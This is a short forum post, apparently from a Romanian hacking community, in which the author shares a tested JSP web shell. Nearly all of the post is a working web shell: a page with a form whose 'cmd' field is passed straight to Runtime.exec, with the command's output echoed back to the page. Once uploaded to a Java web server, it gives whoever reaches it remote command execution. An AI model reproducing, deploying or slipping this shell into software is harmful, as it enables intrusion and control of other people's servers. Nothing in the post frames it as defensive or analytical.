Jump to content
turnback

jsp shell

Recommended Posts

Posted

Am avut nevoie, am cautat pe aici si nu am gasit nimic de genul.

E mic, simplu, testat.

<%@ page import="java.util.*,java.io.*"%>
<%
%>

<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform"ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>

<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") +"<BR>");
Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>

</pre>
</BODY></HTML>

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...